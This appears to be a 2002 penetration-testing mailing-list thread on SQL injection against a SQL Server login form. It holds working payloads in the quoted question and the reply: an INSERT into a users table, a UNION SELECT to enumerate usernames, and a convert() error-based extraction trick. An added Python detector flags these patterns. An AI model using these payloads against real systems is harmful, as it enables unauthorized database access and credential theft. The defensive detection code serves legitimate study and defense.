Re: sql table data enumeration help please.

From: Kevin Spett (kspett@spidynamics.com)
Date: Fri May 10 2002 - 01:38:03 EDT


----- Original Message -----
From: "Gary O'leary-Steele" <GaryO@sec-1.com>
To: <pen-test@securityfocus.com>
Sent: Thursday, May 09, 2002 12:47 PM
Subject: sql table data enumeration help please.

> www.target.comUserName='insert into tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy,CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,Appointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct 31 2000 8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gary','addrto','appointment','01131234567','07796698919','garyo@sec-1.com',01131234567','sig','123','456','ls287sr','01132297541',1)--
>

Did you get an error message of some kind? Try using a semicolon after the
username close quote and doing the INSERT in its own line.

> In an attempt to gain access to data held with the username and password
> fields I have tried
>
> www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from
> tblusers where username >'a'--&password=hacker
>
> but get "Operand type clash: uniqueidentifier is incompatible with int"

This usually means that the column that you have used to inject (the ninth,
in this case) is an int column in the original SELECT statement. The UNION
SELECT column must have the same data type. Try using the convert() hack to
get around this whole issue, like this:

username=invalidusername' + convert(int, (SELECT TOP 1 UserName FROM
tblUsers WHERE Username > 'a')) + ''--

You should get an error message back complaining about type conversion,
which includes the returned value from your subselect.

Kevin.
SPI Dynamics, Inc.
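
The following is an added example, not part of the original post: a defender-side check that flags the request shapes quoted in this thread and the database error text that leaks back to the client. The rule names, sample log lines and the conversion-error wording (SQL Server's message text, not quoted in the thread) are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request-side rules: the three injection shapes quoted in this thread.
REQUEST_RULES = {
    "union_select": re.compile(r"'\s*union\s+(?:all\s+)?select\b"),
    "convert_subselect": re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\b"),
    "quoted_insert": re.compile(r"'\s*;?\s*insert\s+into\b"),
}
# Response-side rules: database error text that reached the client.
RESPONSE_RULES = {
    "type_clash_error": re.compile(r"operand type clash"),
    "conversion_error": re.compile(
        r"(?:syntax error converting|conversion failed when converting) the \w+ value"),
}

def normalize(raw):
    """URL-decode twice (covers double encoding), lowercase, collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(raw)).lower())

def classify(query_string, response_body):
    """Return the sorted names of every rule that fires for one request/response pair."""
    query, body = normalize(query_string), response_body.lower()
    hits = [name for name, rx in REQUEST_RULES.items() if rx.search(query)]
    hits += [name for name, rx in RESPONSE_RULES.items() if rx.search(body)]
    return sorted(hits)

# Constructed samples: (query string as logged, response body returned to the client).
SAMPLES = [
    ("UserName=gary&password=test", "Welcome back"),
    ("UserName=O%27Brien&password=x", "Invalid login"),
    ("UserName=%27insert+into+tblusers(username)+values+(%27test%27)--", "Invalid login"),
    ("UserName=%27Union+select+1,1,1,1,1,1,1,1,min(UserName)+from+tblusers"
     "+where+username+%3E%27a%27--&password=hacker",
     "Operand type clash: uniqueidentifier is incompatible with int"),
    ("username=invalidusername%27+%2B+convert(int,+(SELECT+TOP+1+UserName+FROM"
     "+tblUsers+WHERE+Username+%3E+%27a%27))+%2B+%27%27--",
     "Syntax error converting the nvarchar value 'REDACTED' to a column of data type int."),
]

if __name__ == "__main__":
    for query_string, response_body in SAMPLES:
        print(classify(query_string, response_body) or "clean", "<-", query_string[:60])
```

A response-side hit means raw database errors are reaching the client; returning a generic error page and using parameterized queries removes both the leak and the injection point.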
